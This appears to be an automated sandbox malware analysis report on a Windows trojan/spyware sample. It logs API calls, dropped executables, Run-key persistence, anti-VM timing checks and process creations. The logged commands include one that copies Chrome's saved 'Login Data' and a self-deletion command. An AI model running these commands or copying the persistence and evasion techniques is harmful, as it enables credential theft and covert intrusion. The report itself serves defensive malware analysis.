            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA2D075_2_03CA2D07
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE841F5_2_03BE841F
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9D4665_2_03C9D466
            Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 03BDB150 appears 35 times
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19A50 NtCreateFile,LdrInitializeThunk,5_2_03C19A50
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19A20 NtResumeThread,LdrInitializeThunk,5_2_03C19A20
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C199A0 NtCreateSection,LdrInitializeThunk,5_2_03C199A0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_03C19910
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19840 NtDelayExecution,LdrInitializeThunk,5_2_03C19840
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19860 NtQuerySystemInformation,LdrInitializeThunk,5_2_03C19860
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19FE0 NtCreateMutant,LdrInitializeThunk,5_2_03C19FE0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19780 NtMapViewOfSection,LdrInitializeThunk,5_2_03C19780
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C197A0 NtUnmapViewOfSection,LdrInitializeThunk,5_2_03C197A0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19710 NtQueryInformationToken,LdrInitializeThunk,5_2_03C19710
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C196E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03C196E0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C195D0 NtClose,LdrInitializeThunk,5_2_03C195D0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19540 NtReadFile,LdrInitializeThunk,5_2_03C19540
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C1A3B0 NtGetContextThread,5_2_03C1A3B0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19B00 NtSetValueKey,5_2_03C19B00
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19A80 NtOpenDirectoryObject,5_2_03C19A80
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19A00 NtProtectVirtualMemory,5_2_03C19A00
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19A10 NtQuerySection,5_2_03C19A10
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C199D0 NtCreateProcessEx,5_2_03C199D0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19950 NtQueueApcThread,5_2_03C19950
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C198F0 NtReadVirtualMemory,5_2_03C198F0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C198A0 NtWriteVirtualMemory,5_2_03C198A0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C1B040 NtSuspendThread,5_2_03C1B040
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19820 NtEnumerateKey,5_2_03C19820
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19760 NtOpenProcess,5_2_03C19760
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C1A770 NtOpenThread,5_2_03C1A770
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19770 NtSetInformationFile,5_2_03C19770
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C1A710 NtOpenProcessToken,5_2_03C1A710
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19730 NtQueryVirtualMemory,5_2_03C19730
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C196D0 NtCreateKey,5_2_03C196D0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19650 NtQueryValueKey,5_2_03C19650
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19660 NtAllocateVirtualMemory,5_2_03C19660
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19670 NtQueryInformationProcess,5_2_03C19670
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19610 NtEnumerateValueKey,5_2_03C19610
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C195F0 NtQueryInformationFile,5_2_03C195F0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19560 NtWriteFile,5_2_03C19560
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19520 NtWaitForSingleObject,5_2_03C19520
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C1AD30 NtSetContextThread,5_2_03C1AD30
            Source: TR0627729920002.exe, 00000000.00000002.277070452.0000000002930000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000002.278345155.000000007FCF5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000003.257799024.0000000003BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000002.277410487.00000000034A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000003.237403790.000000007FCD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000003.237626468.000000007FC97000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000002.279158959.000000007FE68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000003.239679096.00000000035D8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000003.239608511.0000000003544000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exeBinary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Jwjxmakrv.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: IconCachet0hh.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: IconCachet0hh.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: IconCachet0hh.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\TR0627729920002.exeSection loaded: system.dllJump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeSection loaded: system.dllJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeSection loaded: system.dllJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeSection loaded: system.dllJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeSection loaded: system.dllJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeSection loaded: system.dllJump to behavior
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exe 3685495D051137B1C4EFDE22C26DF0883614B6453B762FA84588DA55ED2E7744
            Source: TR0627729920002.exeReversingLabs: Detection: 29%
            Source: C:\Users\user\Desktop\TR0627729920002.exeFile read: C:\Users\user\Desktop\TR0627729920002.exeJump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\TR0627729920002.exe "C:\Users\user\Desktop\TR0627729920002.exe"
            Source: C:\Users\user\Desktop\TR0627729920002.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Jwjxmakrv.exe "C:\Users\Public\Libraries\Jwjxmakrv.exe"
            Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Jwjxmakrv.exe "C:\Users\Public\Libraries\Jwjxmakrv.exe"
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\cmd.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\P1bxx\IconCachet0hh.exe C:\Program Files (x86)\P1bxx\IconCachet0hh.exe
            Source: C:\Program Files (x86)\P1bxx\IconCachet0hh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\TR0627729920002.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /kJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Jwjxmakrv.exe "C:\Users\Public\Libraries\Jwjxmakrv.exe" Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\P1bxx\IconCachet0hh.exe C:\Program Files (x86)\P1bxx\IconCachet0hh.exeJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /kJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /kJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\cmd.exe"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
            Source: C:\Users\user\Desktop\TR0627729920002.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B091E540-83E3-11CF-A713-0020AFD79762}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Jwjxmakrvkwfuijrnbpqlslhsyeopao[1]Jump to behavior
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\P1bxxJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@23/8@36/13
            Source: C:\Users\user\Desktop\TR0627729920002.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3436:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4968:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_01
            Source: C:\Users\user\Desktop\TR0627729920002.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000005.00000002.410186369.0000000003CCF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.277914032.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.275403519.0000000003874000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.777435424.0000000004B0F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.409178249.0000000004859000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.407505205.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.774652570.00000000049F0000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: cmd.pdbUGP source: rundll32.exe, 0000001D.00000002.770717003.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.779445654.0000000004F27000.00000004.10000000.00040000.00000000.sdmp, IconCachet0hh.exe.7.dr
            Source: Binary string: wntdll.pdb source: cmd.exe, cmd.exe, 00000005.00000002.410186369.0000000003CCF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.277914032.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.275403519.0000000003874000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.777435424.0000000004B0F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.409178249.0000000004859000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.407505205.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.774652570.00000000049F0000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: rundll32.pdb source: cmd.exe, 00000005.00000002.408560787.0000000003B70000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: rundll32.pdbGCTL source: cmd.exe, 00000005.00000002.408560787.0000000003B70000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: cmd.pdb source: rundll32.exe, 0000001D.00000002.770717003.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.779445654.0000000004F27000.00000004.10000000.00040000.00000000.sdmp, IconCachet0hh.exe.7.dr
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035B8007 push sp; iretd 0_3_035B8009
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF45C pushad ; retf 0_3_035CF460
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF45C pushad ; retf 0_3_035CF460
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0059 pushad ; retf 0_3_035D005A
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0059 pushad ; retf 0_3_035D005A
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0059 pushad ; retf 0_3_035D005A
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0452 pushad ; retf 0_3_035D0458
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0452 pushad ; retf 0_3_035D0458
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0452 pushad ; retf 0_3_035D0458
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF145 pushfd ; retf 0_3_035CF147
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF145 pushfd ; retf 0_3_035CF147
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF37A pushad ; retf 0_3_035CF37B
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF37A pushad ; retf 0_3_035CF37B
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0773 push FFFFFFD3h; ret 0_3_035D0782
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0773 push FFFFFFD3h; ret 0_3_035D0782
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0773 push FFFFFFD3h; ret 0_3_035D0782
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF416 pushad ; retf 0_3_035CF417
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF416 pushad ; retf 0_3_035CF417
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0012 push esp; retf 0_3_035D0029
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0012 push esp; retf 0_3_035D0029
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0012 push esp; retf 0_3_035D0029
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF707 pushad ; retf 0_3_035CF73A
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF707 pushad ; retf 0_3_035CF73A
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D083E push FFFFFFBDh; ret 0_3_035D0890
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D083E push FFFFFFBDh; ret 0_3_035D0890
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D083E push FFFFFFBDh; ret 0_3_035D0890
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CFFDD pushad ; retf 0_3_035D0011
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CFFDD pushad ; retf 0_3_035D0011
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF8D7 push esp; ret 0_3_035CF90C
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF8D7 push esp; ret 0_3_035CF90C
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D06C5 push ecx; retf 0_3_035D06D5
            Source: IconCachet0hh.exe.7.drStatic PE information: section name: .didat
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exeJump to dropped file
            Source: C:\Users\user\Desktop\TR0627729920002.exeFile created: C:\Users\Public\Libraries\Jwjxmakrv.exeJump to dropped file

            Boot Survival

            barindex
            Creates multiple autostart registry keys
            Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 5JJ89HI
            Source: C:\Users\user\Desktop\TR0627729920002.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run JwjxmakrvJump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run JwjxmakrvJump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run JwjxmakrvJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 5JJ89HI
            Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 5JJ89HI
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000050418C04 second address: 0000000050418C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000050418F9E second address: 0000000050418FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000948C04 second address: 0000000000948C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000948F9E second address: 0000000000948FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\explorer.exe TID: 5744Thread sleep time: -40000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D083E rdtsc 0_3_035D083E
            Source: C:\Windows\SysWOW64\cmd.exeAPI coverage: 5.0 %
            Source: C:\Users\user\Desktop\TR0627729920002.exeProcess information queried: ProcessInformationJump to behavior
            Source: explorer.exe, 00000007.00000000.389287152.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
